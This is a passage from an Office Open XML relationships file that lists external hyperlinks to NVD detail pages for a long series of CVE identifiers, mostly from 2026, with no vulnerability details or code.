Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8674" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89064" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90922" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90982" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91015" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91016" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92879" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92920" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92927" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92963" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92973" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53555" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92932" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93295" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93296" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54546" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50603" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50604" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91019" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92921" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54645" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86824" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92611" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54565" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54495" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54551" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78427" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87829" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87831" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91009" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91010" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92839" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92881" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92893" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92894" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92904" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93013" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93307" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81441" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92949" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12284" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61700" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78426" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81438" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81439" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85716" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86446" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91008" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91017" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54471" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45723" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50607" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87836" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75588" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54579" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81637" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92945" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54649" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92962" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92992" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54577" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54578" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82723" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82759" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50606" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50608" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55061" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-3030" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-55787" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-62167" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10594" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11314" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11432" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11874" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49137" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49292" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52483" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53679" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53681" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57846" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57847" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65323" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73245" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73247" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73638" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73639" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78668" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90050" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90051" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90052" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90053" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90054" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90055" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90056" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90057" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90058" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90059" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90060" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90061" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90062" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90063" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90064" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90065" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90066" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90067" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90068" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90069" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90070" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90071" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90072" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90073" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90074" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90075" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90076" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90077" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90078" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90079" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90080" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90081" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90082" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90083" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90084" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90085" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90086" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90087" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90088" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90089" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90090" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90091" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90092" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90093" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90094" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90095" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90096" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90097" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90098" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90099" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90100" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90101" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90102" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90103" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90104" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90105" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90106" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90107" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90108" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90109" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90110" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90111" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90112" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90113" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90114" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90115" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90116" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90117" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90118" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90119" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90120" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90121" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90122" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90123" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90124" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90125" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90126" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90127" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90128" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 